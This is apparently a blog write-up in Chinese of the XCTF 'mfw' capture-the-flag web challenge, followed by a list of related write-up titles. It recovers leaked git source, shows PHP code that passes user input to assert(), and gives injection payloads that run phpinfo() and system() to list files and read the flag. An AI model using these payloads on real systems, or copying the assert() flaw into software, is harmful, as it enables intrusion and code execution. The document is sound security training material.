XCTF WEB mfw

  • 比赛打自闭了,需要好好学习

打开网页看见(猜测git源码泄露):

在URL后面加上./git发现:

使用脚本,在Linux环境中:

pip install requests
git clone https://github.com/wangyihang/GitHacker.git
python GitHacker.py [Website]

得到源码:

flag文件貌似没得啥:

查看index.php文件内容得到PHP源码:

<?phpif (isset($_GET['page'])) {$page = $_GET['page'];
} else {$page = "home";
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");?>
html代码........

代码审计以及思路:

了解assert()函数的使用:

assert()函数会将读入的代码当做PHP代码来执行,这就方便了!!
进行注入,注入的思路:

  • 首先对strpos函数进行闭合,构造一下,page=’)

  • 可以把后面', '..') === false的给注释掉,构造page=').phpinfo();//,可以得到回显

  • 或者不注释也行,直接插入,构造page='.phpinfo().',也可以看见:

  • 既然可以执行函数,那就简单了,使用system()函数(system函数详解),构造查看目录的payload:?page='.system("ls").'或者page=').system("ls");//前者直接显示,后者在源码中才能看见。

  • 由于源码直接下载有,所以直接构造得到flag的payload:?page=').system("cat templates/flag.php");//或者?page='.system("cat templates/flag.php").'两者都需查看源码!!


XCTF WEB mfw相关推荐

  1. 「干货」XCTF Web安全入门练习靶场全部通关教程

    也许每个人出生的时候都以为这世界都是为他一个人而存在的,当他发现自己错的时候,他便开始长大 少走了弯路,也就错过了风景,无论如何,感谢经历 0x01 view_source Write Up XCTF ...

  2. XCTF WEB simple_php

    https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5072 题解: 掌握php弱类型比较 ...

  3. XCTF WEB simple_js

    https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5067 题解: F12查看网页源代码 ...

  4. XCTF WEB command_execution

    https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5071 题解: windows或li ...

  5. XCTF WEB webshell

    https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070 版本一 题解:修改HTML代 ...

  6. XCTF WEB weak_auth

    https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5069 题解:暴力破解 工具:Bur ...

  7. XCTF WEB xff_referer

    https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5068 题解: 工具:Burp Su ...

  8. XCTF WEB disabled_button

    https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5066 题解: 修改HTML代码 然 ...

  9. XCTF WEB cookie

    https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5065 题解: 查看浏览器Cooki ...

  10. XCTF WEB backup

    https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5064 题解: 下载http://1 ...

最新文章

  1. 如何制作启动盘安装ubuntu系统
  2. phpinfo查看可以解析的后缀_配置nginx,Apache支持pathinfo模式-什么是phpinfo模式
  3. Boost:宏BOOST_ASSERT的使用实例
  4. 浙江中医药大学第十一届程序设计竞赛题解
  5. 特性Attribute
  6. C++总结篇(3)String类
  7. centos安装python3.7.0过程记录
  8. 会议管理SaaS平台Social Tables融资1300万美元
  9. Bailian2708 平衡饮食【序列处理】
  10. 没学好 Netty ,要凉?
  11. Windows10+VS2019+OpenGL安装配置详解
  12. 短视频直播怎么搭建_直播平台搭建流程
  13. 移动端 Retina屏 各大主流网站1px的解决方案
  14. win10去掉快捷方式小箭头_快捷方式小箭头很烦人 一招教你取消
  15. 计算机可靠度计算公式,可靠性计算公式大全
  16. SQL注入之Mssql注入及原理
  17. flask容联云发送短信验证码和异步发送
  18. FleaPHP 学习笔记1
  19. 第6期(江西省吉安市永丰县)县长手机信箱工作简报(自吹自擂政绩,自圆其说)
  20. linux-千兆网口测速只有百兆

热门文章

  1. 霍乱时期的爱情——简写(下)
  2. 【Python爬虫】-从入门到入门-个人技术经验汇总-【爬虫和数据】
  3. 年轻人转行需三思,未来5-10年什么工作真吃香?
  4. Google 搜索语法
  5. 图解:什么是拓扑排序?
  6. 运用三角不等式加速Kmeans聚类算法
  7. 67tool.com 即用即走的在线工具箱
  8. 科研方法-X_LAB-方法总结和实践记录
  9. 全面解析Linux 内核 3.10.x - Device Tree 详解
  10. 全新Swagger3.0教程,OAS3快速配置指南,实现API接口文档自动化!